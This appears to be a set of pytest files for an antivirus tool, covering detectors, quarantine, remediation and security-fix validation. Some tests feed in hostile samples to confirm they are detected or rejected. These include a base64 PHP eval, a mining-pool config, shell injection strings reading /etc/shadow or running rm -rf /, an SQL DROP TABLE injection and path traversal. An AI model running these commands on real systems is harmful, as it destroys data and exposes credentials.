cpu=10, mem_pct=20, mem_used=1000, mem_total=8000,
disk_usage=[], load_avg=[0.1], net_conns=5,
)
store.record_metric(
cpu=20, mem_pct=30, mem_used=2000, mem_total=8000,
disk_usage=[], load_avg=[0.2], net_conns=10,
)
history = store.get_metrics_history(hours=1)
assert len(history) == 2
assert history[0]["cpu_percent"] == 10
assert history[1]["cpu_percent"] == 20
def test_cleanup_retains_fresh(store):
"""Cleanup with 0 hours should not delete just-inserted metrics."""
store.record_metric(
cpu=10, mem_pct=20, mem_used=1000, mem_total=8000,
disk_usage=[], load_avg=[], net_conns=0,
)
store.cleanup_old_metrics(hours=0)
assert store.get_latest_metrics() is not None
def test_empty_store_returns_none(store):
"""Empty store returns None / empty lists gracefully."""
assert store.get_latest_metrics() is None
assert store.get_recent_threats(10) == []
assert store.get_recent_scans(10) == []
assert store.get_recent_logs(10) == []
stats = store.get_threat_stats()
assert stats["total"] == 0
def test_thread_safety(store):
"""Concurrent writes from multiple threads should not crash."""
errors = []
def writer(n):
try:
for i in range(10):
store.record_metric(
cpu=float(n * 10 + i), mem_pct=50, mem_used=4000,
mem_total=8000, disk_usage=[], load_avg=[], net_conns=0,
)
except Exception as e:
errors.append(e)
threads = [threading.Thread(target=writer, args=(i,)) for i in range(5)]
for t in threads:
t.start()
for t in threads:
t.join()
assert len(errors) == 0

View File

@@ -0,0 +1,48 @@
import os
import tempfile
import pytest
def test_heuristic_detector_import():
from ayn_antivirus.detectors.heuristic_detector import HeuristicDetector
detector = HeuristicDetector()
assert detector is not None
def test_heuristic_suspicious_strings(tmp_path):
from ayn_antivirus.detectors.heuristic_detector import HeuristicDetector
malicious = tmp_path / "evil.php"
malicious.write_text("<?php eval(base64_decode('ZXZpbCBjb2Rl')); ?>")
detector = HeuristicDetector()
results = detector.detect(str(malicious))
assert len(results) > 0
def test_cryptominer_detector_import():
from ayn_antivirus.detectors.cryptominer_detector import CryptominerDetector
detector = CryptominerDetector()
assert detector is not None
def test_cryptominer_stratum_detection(tmp_path):
from ayn_antivirus.detectors.cryptominer_detector import CryptominerDetector
miner_config = tmp_path / "config.json"
miner_config.write_text('{"url": "stratum+tcp://pool.minexmr.com:4444", "user": "wallet123"}')
detector = CryptominerDetector()
results = detector.detect(str(miner_config))
assert len(results) > 0
def test_spyware_detector_import():
from ayn_antivirus.detectors.spyware_detector import SpywareDetector
detector = SpywareDetector()
assert detector is not None
def test_rootkit_detector_import():
from ayn_antivirus.detectors.rootkit_detector import RootkitDetector
detector = RootkitDetector()
assert detector is not None
def test_signature_detector_import():
from ayn_antivirus.detectors.signature_detector import SignatureDetector
assert SignatureDetector is not None
def test_yara_detector_graceful():
from ayn_antivirus.detectors.yara_detector import YaraDetector
detector = YaraDetector()
assert detector is not None

View File

@@ -0,0 +1,61 @@
import os
import tempfile
import pytest
from datetime import datetime
from ayn_antivirus.core.engine import (
ThreatType, Severity, ScanType, ThreatInfo,
ScanResult, FileScanResult, ScanEngine
)
from ayn_antivirus.core.event_bus import EventBus, EventType
def test_threat_type_enum():
assert ThreatType.VIRUS.value is not None
assert ThreatType.MINER.value is not None
def test_severity_enum():
assert Severity.CRITICAL.value is not None
assert Severity.LOW.value is not None
def test_threat_info_creation():
threat = ThreatInfo(
path="/tmp/evil.sh",
threat_name="TestMalware",
threat_type=ThreatType.MALWARE,
severity=Severity.HIGH,
detector_name="test",
details="Test detection",
file_hash="abc123"
)
assert threat.path == "/tmp/evil.sh"
assert threat.threat_type == ThreatType.MALWARE
def test_scan_result_creation():
result = ScanResult(
scan_id="test-123",
start_time=datetime.now(),
end_time=datetime.now(),
files_scanned=100,
files_skipped=5,
threats=[],
scan_path="/tmp",
scan_type=ScanType.QUICK
)
assert result.files_scanned == 100
assert len(result.threats) == 0
def test_event_bus():
bus = EventBus()
received = []
bus.subscribe(EventType.THREAT_FOUND, lambda et, data: received.append(data))
bus.publish(EventType.THREAT_FOUND, {"test": True})
assert len(received) == 1
assert received[0]["test"] == True
def test_scan_clean_file(tmp_path):
clean_file = tmp_path / "clean.txt"
clean_file.write_text("This is a perfectly normal text file with nothing suspicious.")
from ayn_antivirus.config import Config
config = Config()
engine = ScanEngine(config)
result = engine.scan_file(str(clean_file))
assert isinstance(result, FileScanResult)

View File

@@ -0,0 +1,117 @@
"""Tests for the event bus pub/sub system."""
import pytest
from ayn_antivirus.core.event_bus import EventBus, EventType
def test_subscribe_and_publish():
bus = EventBus()
received = []
bus.subscribe(EventType.THREAT_FOUND, lambda et, data: received.append(data))
bus.publish(EventType.THREAT_FOUND, {"test": True})
assert len(received) == 1
assert received[0]["test"] is True
def test_multiple_subscribers():
bus = EventBus()
r1, r2 = [], []
bus.subscribe(EventType.SCAN_STARTED, lambda et, d: r1.append(d))
bus.subscribe(EventType.SCAN_STARTED, lambda et, d: r2.append(d))
bus.publish(EventType.SCAN_STARTED, "go")
assert len(r1) == 1
assert len(r2) == 1
def test_unsubscribe():
bus = EventBus()
received = []
cb = lambda et, d: received.append(d)
bus.subscribe(EventType.FILE_SCANNED, cb)
bus.unsubscribe(EventType.FILE_SCANNED, cb)
bus.publish(EventType.FILE_SCANNED, "data")
assert len(received) == 0
def test_unsubscribe_nonexistent():
"""Unsubscribing a callback that was never registered should not crash."""
bus = EventBus()
bus.unsubscribe(EventType.FILE_SCANNED, lambda et, d: None)
def test_publish_no_subscribers():
"""Publishing with no subscribers should not crash."""
bus = EventBus()
bus.publish(EventType.SCAN_COMPLETED, "no crash")
def test_subscriber_exception_isolated():
"""A failing subscriber must not prevent other subscribers from running."""
bus = EventBus()
received = []
bus.subscribe(EventType.THREAT_FOUND, lambda et, d: 1 / 0) # will raise
bus.subscribe(EventType.THREAT_FOUND, lambda et, d: received.append(d))
bus.publish(EventType.THREAT_FOUND, "data")
assert len(received) == 1
def test_all_event_types():
"""Every EventType value can be published without error."""
bus = EventBus()
for et in EventType:
bus.publish(et, None)
def test_clear_all():
bus = EventBus()
received = []
bus.subscribe(EventType.THREAT_FOUND, lambda et, d: received.append(d))
bus.subscribe(EventType.SCAN_STARTED, lambda et, d: received.append(d))
bus.clear()
bus.publish(EventType.THREAT_FOUND, "a")
bus.publish(EventType.SCAN_STARTED, "b")
assert len(received) == 0
def test_clear_single_event():
bus = EventBus()
r1, r2 = [], []
bus.subscribe(EventType.THREAT_FOUND, lambda et, d: r1.append(d))
bus.subscribe(EventType.SCAN_STARTED, lambda et, d: r2.append(d))
bus.clear(EventType.THREAT_FOUND)
bus.publish(EventType.THREAT_FOUND, "a")
bus.publish(EventType.SCAN_STARTED, "b")
assert len(r1) == 0 # cleared
assert len(r2) == 1 # still active
def test_callback_receives_event_type():
"""Callback receives (event_type, data) — verify event_type is correct."""
bus = EventBus()
calls = []
bus.subscribe(EventType.QUARANTINE_ACTION, lambda et, d: calls.append((et, d)))
bus.publish(EventType.QUARANTINE_ACTION, "payload")
assert calls[0][0] is EventType.QUARANTINE_ACTION
assert calls[0][1] == "payload"
def test_duplicate_subscribe():
"""Subscribing the same callback twice should only register it once."""
bus = EventBus()
received = []
cb = lambda et, d: received.append(d)
bus.subscribe(EventType.SCAN_COMPLETED, cb)
bus.subscribe(EventType.SCAN_COMPLETED, cb)
bus.publish(EventType.SCAN_COMPLETED, "x")
assert len(received) == 1
def test_event_type_values():
"""All expected event types exist."""
expected = {
"THREAT_FOUND", "SCAN_STARTED", "SCAN_COMPLETED", "FILE_SCANNED",
"SIGNATURE_UPDATED", "QUARANTINE_ACTION", "REMEDIATION_ACTION",
"DASHBOARD_METRIC",
}
actual = {et.name for et in EventType}
assert expected == actual

View File

@@ -0,0 +1,95 @@
"""Tests for real-time monitor."""
import pytest
import time
from ayn_antivirus.monitor.realtime import RealtimeMonitor
from ayn_antivirus.core.engine import ScanEngine
from ayn_antivirus.config import Config
@pytest.fixture
def monitor(tmp_path):
config = Config()
engine = ScanEngine(config)
m = RealtimeMonitor(config, engine)
yield m
if m.is_running:
m.stop()
def test_monitor_init(monitor):
assert monitor is not None
assert monitor.is_running is False
def test_monitor_should_skip():
"""Temporary / lock / editor files should be skipped."""
config = Config()
engine = ScanEngine(config)
m = RealtimeMonitor(config, engine)
assert m._should_skip("/tmp/test.tmp") is True
assert m._should_skip("/tmp/test.swp") is True
assert m._should_skip("/tmp/test.lock") is True
assert m._should_skip("/tmp/.#backup") is True
assert m._should_skip("/tmp/test.part") is True
assert m._should_skip("/tmp/test.txt") is False
assert m._should_skip("/tmp/test.py") is False
assert m._should_skip("/var/www/index.html") is False
def test_monitor_debounce(monitor):
"""After the first call records the path, an immediate repeat is debounced."""
import time as _time
# Prime the path so it's recorded with the current monotonic time.
# On fresh processes, monotonic() can be close to 0.0 which is the
# default in _recent, so we explicitly set a realistic timestamp.
monitor._recent["/tmp/test.txt"] = _time.monotonic() - 10
assert monitor._is_debounced("/tmp/test.txt") is False
# Immediate second call should be debounced (within 2s window)
assert monitor._is_debounced("/tmp/test.txt") is True
def test_monitor_debounce_different_paths(monitor):
"""Different paths should not debounce each other."""
import time as _time
# Prime both paths far enough in the past to avoid the initial-value edge case
past = _time.monotonic() - 10
monitor._recent["/tmp/a.txt"] = past
monitor._recent["/tmp/b.txt"] = past
assert monitor._is_debounced("/tmp/a.txt") is False
assert monitor._is_debounced("/tmp/b.txt") is False
def test_monitor_start_stop(tmp_path, monitor):
monitor.start(paths=[str(tmp_path)], recursive=True)
assert monitor.is_running is True
time.sleep(0.3)
monitor.stop()
assert monitor.is_running is False
def test_monitor_double_start(tmp_path, monitor):
"""Starting twice should be harmless."""
monitor.start(paths=[str(tmp_path)])
assert monitor.is_running is True
monitor.start(paths=[str(tmp_path)]) # Should log warning, not crash
assert monitor.is_running is True
monitor.stop()
def test_monitor_stop_when_not_running(monitor):
"""Stopping when not running should be harmless."""
assert monitor.is_running is False
monitor.stop()
assert monitor.is_running is False
def test_monitor_nonexistent_path(monitor):
"""Non-existent paths should be skipped without crash."""
monitor.start(paths=["/nonexistent/path/xyz123"])
# Should still be running (observer started, just no schedules)
assert monitor.is_running is True
monitor.stop()

View File

@@ -0,0 +1,139 @@
"""Tests for auto-patcher."""
import pytest
import os
import stat
from ayn_antivirus.remediation.patcher import AutoPatcher, RemediationAction
def test_patcher_init():
p = AutoPatcher(dry_run=True)
assert p.dry_run is True
assert p.actions == []
def test_patcher_init_live():
p = AutoPatcher(dry_run=False)
assert p.dry_run is False
def test_fix_permissions_dry_run(tmp_path):
f = tmp_path / "test.sh"
f.write_text("#!/bin/bash")
f.chmod(0o4755) # SUID
p = AutoPatcher(dry_run=True)
action = p.fix_permissions(str(f))
assert action is not None
assert action.success is True
assert action.dry_run is True
# In dry run, file should still have SUID
assert f.stat().st_mode & stat.S_ISUID
def test_fix_permissions_real(tmp_path):
f = tmp_path / "test.sh"
f.write_text("#!/bin/bash")
f.chmod(0o4755) # SUID
p = AutoPatcher(dry_run=False)
action = p.fix_permissions(str(f))
assert action.success is True
# SUID should be stripped
assert not (f.stat().st_mode & stat.S_ISUID)
def test_fix_permissions_already_safe(tmp_path):
f = tmp_path / "safe.txt"
f.write_text("hello")
f.chmod(0o644)
p = AutoPatcher(dry_run=False)
action = p.fix_permissions(str(f))
assert action.success is True
assert "already safe" in action.details
def test_fix_permissions_sgid(tmp_path):
f = tmp_path / "sgid.sh"
f.write_text("#!/bin/bash")
f.chmod(0o2755) # SGID
p = AutoPatcher(dry_run=False)
action = p.fix_permissions(str(f))
assert action.success is True
assert not (f.stat().st_mode & stat.S_ISGID)
def test_fix_permissions_world_writable(tmp_path):
f = tmp_path / "ww.txt"
f.write_text("data")
f.chmod(0o777) # World-writable
p = AutoPatcher(dry_run=False)
action = p.fix_permissions(str(f))
assert action.success is True
assert not (f.stat().st_mode & stat.S_IWOTH)
def test_block_domain_dry_run():
p = AutoPatcher(dry_run=True)
action = p.block_domain("evil.example.com")
assert action is not None
assert action.success is True
assert action.dry_run is True
assert "evil.example.com" in action.target
def test_block_ip_dry_run():
p = AutoPatcher(dry_run=True)
action = p.block_ip("1.2.3.4")
assert action.success is True
assert action.dry_run is True
assert "1.2.3.4" in action.target
def test_remediate_threat_dry_run(tmp_path):
# Create a dummy file
f = tmp_path / "malware.bin"
f.write_text("evil_payload")
f.chmod(0o4755)
p = AutoPatcher(dry_run=True)
threat = {
"path": str(f),
"threat_name": "Test.Malware",
"threat_type": "MALWARE",
"severity": "HIGH",
}
actions = p.remediate_threat(threat)
assert isinstance(actions, list)
assert len(actions) >= 1
# Should have at least a fix_permissions action
action_names = [a.action for a in actions]
assert "fix_permissions" in action_names
def test_remediate_threat_miner_with_domain():
p = AutoPatcher(dry_run=True)
threat = {
"threat_type": "MINER",
"domain": "pool.evil.com",
"ip": "1.2.3.4",
}
actions = p.remediate_threat(threat)
action_names = [a.action for a in actions]
assert "block_domain" in action_names
assert "block_ip" in action_names
def test_remediation_action_dataclass():
a = RemediationAction(
action="test_action", target="/tmp/test", details="testing",
success=True, dry_run=True,
)
assert a.action == "test_action"
assert a.target == "/tmp/test"
assert a.success is True
assert a.dry_run is True
def test_fix_ld_preload_missing():
"""ld.so.preload doesn't exist — should succeed gracefully."""
p = AutoPatcher(dry_run=True)
action = p.fix_ld_preload()
assert action.success is True

View File

@@ -0,0 +1,50 @@
import os
import pytest
from ayn_antivirus.quarantine.vault import QuarantineVault
def test_quarantine_and_restore(tmp_path):
vault_dir = tmp_path / "vault"
key_file = tmp_path / "keys" / "vault.key"
vault = QuarantineVault(str(vault_dir), str(key_file))
test_file = tmp_path / "malware.txt"
test_file.write_text("this is malicious content")
threat_info = {
"threat_name": "TestVirus",
"threat_type": "virus",
"severity": "high"
}
qid = vault.quarantine_file(str(test_file), threat_info)
assert qid is not None
assert not test_file.exists()
assert vault.count() == 1
restore_path = tmp_path / "restored.txt"
vault.restore_file(qid, str(restore_path))
assert restore_path.exists()
assert restore_path.read_text() == "this is malicious content"
def test_quarantine_list(tmp_path):
vault_dir = tmp_path / "vault"
key_file = tmp_path / "keys" / "vault.key"
vault = QuarantineVault(str(vault_dir), str(key_file))
test_file = tmp_path / "test.txt"
test_file.write_text("content")
vault.quarantine_file(str(test_file), {"threat_name": "Test", "threat_type": "virus", "severity": "low"})
items = vault.list_quarantined()
assert len(items) == 1
def test_quarantine_delete(tmp_path):
vault_dir = tmp_path / "vault"
key_file = tmp_path / "keys" / "vault.key"
vault = QuarantineVault(str(vault_dir), str(key_file))
test_file = tmp_path / "test.txt"
test_file.write_text("content")
qid = vault.quarantine_file(str(test_file), {"threat_name": "Test", "threat_type": "virus", "severity": "low"})
assert vault.delete_file(qid) == True
assert vault.count() == 0

View File

@@ -0,0 +1,54 @@
import json
import pytest
from datetime import datetime
from ayn_antivirus.core.engine import ScanResult, ScanType, ThreatInfo, ThreatType, Severity
from ayn_antivirus.reports.generator import ReportGenerator
def _make_scan_result():
return ScanResult(
scan_id="test-001",
start_time=datetime.now(),
end_time=datetime.now(),
files_scanned=500,
files_skipped=10,
threats=[
ThreatInfo(
path="/tmp/evil.sh",
threat_name="ReverseShell",
threat_type=ThreatType.MALWARE,
severity=Severity.CRITICAL,
detector_name="heuristic",
details="Reverse shell detected",
file_hash="abc123"
)
],
scan_path="/tmp",
scan_type=ScanType.FULL
)
def test_text_report():
gen = ReportGenerator()
result = _make_scan_result()
text = gen.generate_text(result)
assert "AYN ANTIVIRUS" in text
assert "ReverseShell" in text
def test_json_report():
gen = ReportGenerator()
result = _make_scan_result()
j = gen.generate_json(result)
data = json.loads(j)
assert data["summary"]["total_threats"] == 1
def test_html_report():
gen = ReportGenerator()
result = _make_scan_result()
html = gen.generate_html(result)
assert "<html" in html
assert "ReverseShell" in html
assert "CRITICAL" in html
def test_save_report(tmp_path):
gen = ReportGenerator()
gen.save_report("test content", str(tmp_path / "report.txt"))
assert (tmp_path / "report.txt").read_text() == "test content"

View File

@@ -0,0 +1,72 @@
"""Tests for scheduler."""
import pytest
from ayn_antivirus.core.scheduler import Scheduler, _cron_to_schedule, _parse_cron_field
from ayn_antivirus.config import Config
def test_scheduler_init():
config = Config()
s = Scheduler(config)
assert s is not None
assert s.config is config
def test_cron_parse_simple():
"""Standard daily-at-midnight expression."""
result = _cron_to_schedule("0 0 * * *")
assert result["minutes"] == [0]
assert result["hours"] == [0]
def test_cron_parse_step():
"""Every-5-minutes expression."""
result = _cron_to_schedule("*/5 * * * *")
assert 0 in result["minutes"]
assert 5 in result["minutes"]
assert 55 in result["minutes"]
assert len(result["minutes"]) == 12
def test_cron_parse_range():
"""Specific range of hours."""
result = _cron_to_schedule("30 9-17 * * *")
assert result["minutes"] == [30]
assert result["hours"] == list(range(9, 18))
def test_cron_parse_invalid():
"""Invalid cron expression raises ValueError."""
with pytest.raises(ValueError, match="5-field"):
_cron_to_schedule("bad input")
def test_schedule_scan():
config = Config()
s = Scheduler(config)
# Scheduling should not crash
s.schedule_scan("0 0 * * *", "full")
s.schedule_scan("30 2 * * *", "quick")
# Jobs should have been registered
jobs = s._scheduler.get_jobs()
assert len(jobs) >= 2
def test_schedule_update():
config = Config()
s = Scheduler(config)
s.schedule_update(interval_hours=6)
jobs = s._scheduler.get_jobs()
assert len(jobs) >= 1
def test_parse_cron_field_literal():
assert _parse_cron_field("5", 0, 59) == [5]
def test_parse_cron_field_comma():
assert _parse_cron_field("1,3,5", 0, 59) == [1, 3, 5]
def test_parse_cron_field_wildcard():
result = _parse_cron_field("*", 0, 6)
assert result == [0, 1, 2, 3, 4, 5, 6]

View File

@@ -0,0 +1,197 @@
"""Security tests — validate fixes for audit findings."""
import os
import tempfile
import pytest
# -----------------------------------------------------------------------
# Fix 2: SQL injection in ioc_db._count()
# -----------------------------------------------------------------------
class TestIOCTableWhitelist:
@pytest.fixture(autouse=True)
def setup_db(self, tmp_path):
from ayn_antivirus.signatures.db.ioc_db import IOCDatabase
self.db = IOCDatabase(tmp_path / "test_ioc.db")
self.db.initialize()
yield
self.db.close()
def test_valid_tables(self):
for table in ("ioc_ips", "ioc_domains", "ioc_urls"):
assert self.db._count(table) >= 0
def test_injection_blocked(self):
with pytest.raises(ValueError, match="Invalid table"):
self.db._count("ioc_ips; DROP TABLE ioc_ips; --")
def test_arbitrary_table_blocked(self):
with pytest.raises(ValueError, match="Invalid table"):
self.db._count("evil_table")
def test_valid_tables_frozenset(self):
from ayn_antivirus.signatures.db.ioc_db import IOCDatabase
assert isinstance(IOCDatabase._VALID_TABLES, frozenset)
assert IOCDatabase._VALID_TABLES == {"ioc_ips", "ioc_domains", "ioc_urls"}
# -----------------------------------------------------------------------
# Fix 4: Quarantine ID path traversal
# -----------------------------------------------------------------------
class TestQuarantineIDValidation:
@pytest.fixture(autouse=True)
def setup_vault(self, tmp_path):
from ayn_antivirus.quarantine.vault import QuarantineVault
self.vault = QuarantineVault(
tmp_path / "vault", tmp_path / "vault" / ".key"
)
def test_traversal_blocked(self):
with pytest.raises(ValueError, match="Invalid quarantine ID"):
self.vault._validate_qid("../../etc/passwd")
def test_too_short(self):
with pytest.raises(ValueError, match="Invalid quarantine ID"):
self.vault._validate_qid("abc")
def test_too_long(self):
with pytest.raises(ValueError, match="Invalid quarantine ID"):
self.vault._validate_qid("a" * 33)
def test_non_hex(self):
with pytest.raises(ValueError, match="Invalid quarantine ID"):
self.vault._validate_qid("GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG")
def test_uppercase_hex_rejected(self):
with pytest.raises(ValueError, match="Invalid quarantine ID"):
self.vault._validate_qid("A" * 32)
def test_valid_id(self):
assert self.vault._validate_qid("a" * 32) == "a" * 32
assert self.vault._validate_qid("0123456789abcdef" * 2) == "0123456789abcdef" * 2
def test_whitespace_stripped(self):
padded = " " + "a" * 32 + " "
assert self.vault._validate_qid(padded) == "a" * 32
# -----------------------------------------------------------------------
# Fix 3: Quarantine restore path traversal
# -----------------------------------------------------------------------
class TestRestorePathValidation:
@pytest.fixture(autouse=True)
def setup_vault(self, tmp_path):
from ayn_antivirus.quarantine.vault import QuarantineVault
self.vault = QuarantineVault(
tmp_path / "vault", tmp_path / "vault" / ".key"
)
def test_etc_blocked(self):
with pytest.raises(ValueError, match="protected path"):
self.vault._validate_restore_path("/etc/shadow")
def test_usr_bin_blocked(self):
with pytest.raises(ValueError, match="protected path"):
self.vault._validate_restore_path("/usr/bin/evil")
def test_cron_blocked(self):
with pytest.raises(ValueError, match="Refusing to restore"):
self.vault._validate_restore_path("/etc/cron.d/backdoor")
def test_systemd_blocked(self):
with pytest.raises(ValueError, match="Refusing to restore"):
self.vault._validate_restore_path("/etc/systemd/system/evil.service")
def test_safe_path_allowed(self):
result = self.vault._validate_restore_path("/tmp/restored.txt")
assert result.name == "restored.txt"
# -----------------------------------------------------------------------
# Fix 5: Container scanner command injection
# -----------------------------------------------------------------------
class TestContainerIDSanitization:
@pytest.fixture(autouse=True)
def setup_scanner(self):
from ayn_antivirus.scanners.container_scanner import ContainerScanner
self.scanner = ContainerScanner()
def test_semicolon_injection(self):
with pytest.raises(ValueError):
self.scanner._sanitize_id("abc; rm -rf /")
def test_dollar_injection(self):
with pytest.raises(ValueError):
self.scanner._sanitize_id("$(cat /etc/shadow)")
def test_backtick_injection(self):
with pytest.raises(ValueError):
self.scanner._sanitize_id("`whoami`")
def test_pipe_injection(self):
with pytest.raises(ValueError):
self.scanner._sanitize_id("abc|cat /etc/passwd")
def test_ampersand_injection(self):
with pytest.raises(ValueError):
self.scanner._sanitize_id("abc && echo pwned")
def test_empty_rejected(self):
with pytest.raises(ValueError):
self.scanner._sanitize_id("")
def test_too_long_rejected(self):
with pytest.raises(ValueError):
self.scanner._sanitize_id("a" * 200)
def test_valid_ids(self):
assert self.scanner._sanitize_id("abc123") == "abc123"
assert self.scanner._sanitize_id("my-container") == "my-container"
assert self.scanner._sanitize_id("web_app.v2") == "web_app.v2"
assert self.scanner._sanitize_id("a1b2c3d4e5f6") == "a1b2c3d4e5f6"
# -----------------------------------------------------------------------
# Fix 6: Config key validation
# -----------------------------------------------------------------------
def test_config_key_whitelist_in_cli():
"""The config --set handler should reject unknown keys.
We verify by inspecting the CLI module source for the VALID_CONFIG_KEYS
set and its guard clause, since it's defined inside a Click command body.
"""
import inspect
import ayn_antivirus.cli as cli_mod
src = inspect.getsource(cli_mod)
assert "VALID_CONFIG_KEYS" in src
assert '"scan_paths"' in src
assert '"dashboard_port"' in src
# Verify the guard clause exists
assert "if key not in VALID_CONFIG_KEYS" in src
# -----------------------------------------------------------------------
# Fix 9: API query param validation
# -----------------------------------------------------------------------
def test_safe_int_helper():
from ayn_antivirus.dashboard.api import _safe_int
assert _safe_int("50", 10) == 50
assert _safe_int("abc", 10) == 10
assert _safe_int("", 10) == 10
assert _safe_int(None, 10) == 10
assert _safe_int("-5", 10, min_val=1) == 1
assert _safe_int("9999", 10, max_val=500) == 500
assert _safe_int("0", 10, min_val=1) == 1

View File

@@ -0,0 +1,53 @@
import os
import tempfile
import pytest
from ayn_antivirus.signatures.db.hash_db import HashDatabase
from ayn_antivirus.signatures.db.ioc_db import IOCDatabase
def test_hash_db_create(tmp_path):
db = HashDatabase(str(tmp_path / "test.db"))
db.initialize()
assert db.count() == 0
db.close()
def test_hash_db_add_and_lookup(tmp_path):
db = HashDatabase(str(tmp_path / "test.db"))
db.initialize()
db.add_hash("abc123hash", "TestMalware", "virus", "high", "test")
result = db.lookup("abc123hash")
assert result is not None
assert result["threat_name"] == "TestMalware"
db.close()
def test_hash_db_bulk_add(tmp_path):
db = HashDatabase(str(tmp_path / "test.db"))
db.initialize()
records = [
("hash1", "Malware1", "virus", "high", "test", ""),
("hash2", "Malware2", "malware", "medium", "test", ""),
("hash3", "Miner1", "miner", "high", "test", ""),
]
count = db.bulk_add(records)
assert count == 3
assert db.count() == 3
db.close()
def test_ioc_db_ips(tmp_path):
db = IOCDatabase(str(tmp_path / "test.db"))
db.initialize()
db.add_ip("1.2.3.4", "BotnetC2", "c2", "feodo")
result = db.lookup_ip("1.2.3.4")
assert result is not None
ips = db.get_all_malicious_ips()
assert "1.2.3.4" in ips
db.close()
def test_ioc_db_domains(tmp_path):
db = IOCDatabase(str(tmp_path / "test.db"))
db.initialize()
db.add_domain("evil.com", "Phishing", "phishing", "threatfox")
result = db.lookup_domain("evil.com")
assert result is not None
domains = db.get_all_malicious_domains()
assert "evil.com" in domains
db.close()

View File

@@ -0,0 +1,49 @@
import os
import tempfile
import pytest
from ayn_antivirus.utils.helpers import (
format_size, format_duration, is_root, validate_ip,
validate_domain, generate_id, hash_file, safe_path
)
def test_format_size():
assert format_size(0) == "0.0 B"
assert format_size(1024) == "1.0 KB"
assert format_size(1048576) == "1.0 MB"
assert format_size(1073741824) == "1.0 GB"
def test_format_duration():
assert "0s" in format_duration(0) or "0" in format_duration(0)
result = format_duration(3661)
assert "1h" in result
assert "1m" in result
def test_validate_ip():
assert validate_ip("192.168.1.1") == True
assert validate_ip("10.0.0.1") == True
assert validate_ip("999.999.999.999") == False
assert validate_ip("not-an-ip") == False
assert validate_ip("") == False
def test_validate_domain():
assert validate_domain("example.com") == True
assert validate_domain("sub.example.com") == True
assert validate_domain("") == False
def test_generate_id():
id1 = generate_id()
id2 = generate_id()
assert isinstance(id1, str)
assert len(id1) == 32
assert id1 != id2
def test_hash_file(tmp_path):
f = tmp_path / "test.txt"
f.write_text("hello world")
h = hash_file(str(f))
assert isinstance(h, str)
assert len(h) == 64 # sha256 hex
def test_safe_path(tmp_path):
result = safe_path(str(tmp_path))
assert result is not None

BIN
hub-check.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 97 KiB